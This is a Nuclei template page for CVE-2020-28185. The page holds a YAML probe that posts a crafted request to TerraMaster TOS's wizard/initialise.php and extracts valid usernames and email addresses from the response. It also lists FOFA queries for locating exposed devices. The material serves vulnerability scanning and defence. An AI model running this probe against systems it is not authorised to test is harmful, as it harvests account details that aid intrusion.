Skip to content
Nuclei Templates

TerraMaster TOS < 4.2.06 - User Enumeration

ID: CVE-2020-28185

Severity: medium

Author: pussycat0x

Tags: cve2020,cve,terramaster,enum,tos,terra-master

Description

Section titled “Description”

User Enumeration vulnerability in TerraMaster TOS <= 4.2.06 allows remote unauthenticated attackers to identify valid users within the system via the username parameter to wizard/initialise.php.

YAML Source

Section titled “YAML Source”
id: CVE-2020-28185


info:
  name: TerraMaster TOS < 4.2.06 - User Enumeration
  author: pussycat0x
  severity: medium
  description: |
    User Enumeration vulnerability in TerraMaster TOS <= 4.2.06 allows remote unauthenticated attackers to identify valid users within the system via the username parameter to wizard/initialise.php.
  impact: |
    An attacker can enumerate valid usernames, potentially aiding in further attacks.
  remediation: |
    Upgrade TerraMaster TOS to version 4.2.06 or later.
  reference:
    - https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/TerraMaster%20TOS%20%E7%94%A8%E6%88%B7%E6%9E%9A%E4%B8%BE%E6%BC%8F%E6%B4%9E%20CVE-2020-28185.md
    - https://nvd.nist.gov/vuln/detail/CVE-2020-28185
    - https://www.ihteam.net/advisory/terramaster-tos-multiple-vulnerabilities/
    - https://www.terra-master.com/
    - https://github.com/ArrestX/--POC
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2020-28185
    epss-score: 0.00465
    epss-percentile: 0.75439
    cpe: cpe:2.3:o:terra-master:tos:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: terra-master
    product: tos
    fofa-query:
      - '"TerraMaster" && header="TOS"'
      - '"terramaster" && header="tos"'
  tags: cve2020,cve,terramaster,enum,tos,terra-master


http:
  - raw:
      - |
        GET /tos/index.php?user/login HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /wizard/initialise.php HTTP/1.1
        Host: {{Hostname}}
        Accept-Encoding: gzip, deflate
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
        X-Requested-With: XMLHttpRequest
        Referer: {{RootURL}}/tos/index.php?user/login


        tab=checkuser&username=admin


    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"username":'
          - '"email":'
          - '"status":'
        condition: and


      - type: status
        status:
          - 200


    extractors:
      - type: regex
        part: body_2
        regex:
          - '"username":"(.*?)"'
          - '"email":"(.*?)"'
# digest: 4b0a00483046022100b8957760790781ac621ac812e594439be4480e889430f4781308294c83314954022100ce26b7e02df2b5488ee25d3d1262616114e6ed0fae1ace81c200391ec52f793b:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2020/CVE-2020-28185.yaml"

View on Github